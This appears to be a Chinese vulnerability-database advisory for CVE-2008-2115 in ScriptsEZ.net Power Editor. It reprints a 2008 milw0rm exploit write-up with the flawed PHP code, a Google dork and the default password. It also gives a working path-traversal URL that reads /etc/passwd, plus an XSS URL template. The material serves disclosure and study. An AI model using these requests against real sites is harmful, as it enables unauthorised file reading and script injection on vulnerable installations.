ScriptsEZ.net Power Editor 'editor.php'多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115130 漏洞类型 跨站脚本
发布时间 2008-05-05 更新时间 2009-01-29
CVE编号 CVE-2008-2115 CNNVD-ID CNNVD-200805-068
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5549
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-068
|漏洞详情
ScriptsEZ.netPowerEditor2.0版本中的editor.php存在多个跨站脚本攻击漏洞。远程攻击者可以借助tempedit操作中的(1)te和(2)dir参数,注入任意的web脚本或HTML。
|漏洞EXP
########################################################################
             #                                                                      #
             #    ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::...     #           
             ########################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
download:http://www.scriptsez.net/index.php?action=details&cat=Content%20Management&id=1063623812
dork: Powered By Power Editor
-----------------------------------
vuln code in editor.php:
line 84-94:
if ($action=="tempedit") {
$n=base64_decode($m);    
if ($n==$password){
template();
$te=$HTTP_GET_VARS['te'];
$dir=$HTTP_GET_VARS['dir'];
$filename = "$dir/$te";
$fd = fopen ($filename, "r");
$stuff = fread ($fd, filesize ($filename));
fclose ($fd);
?>
-------
vuln:
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]
examp:
editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..

-------------------------------------
and xss here :D :
http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]
-----
note:
default pass for login is:changeme
-----
young iranian h4ck3rz
/* tnx 2:
st0rke,aria-security.net,r00tshell.org,all h4ck3rz */

# milw0rm.com [2008-05-05]
|参考资料

来源:XF
名称:powereditor-editor-xss(42223)
链接:http://xforce.iss.net/xforce/xfdb/42223
来源:BID
名称:29063
链接:http://www.securityfocus.com/bid/29063
来源:BUGTRAQ
名称:20080506PowerEditorLOCALFILEINCLUSIONVulnerbility
链接:http://www.securityfocus.com/archive/1/archive/1/491702/100/0/threaded
来源:MILW0RM
名称:5549
链接:http://www.milw0rm.com/exploits/5549
来源:SREASON
名称:3864
链接:http://securityreason.com/securityalert/3864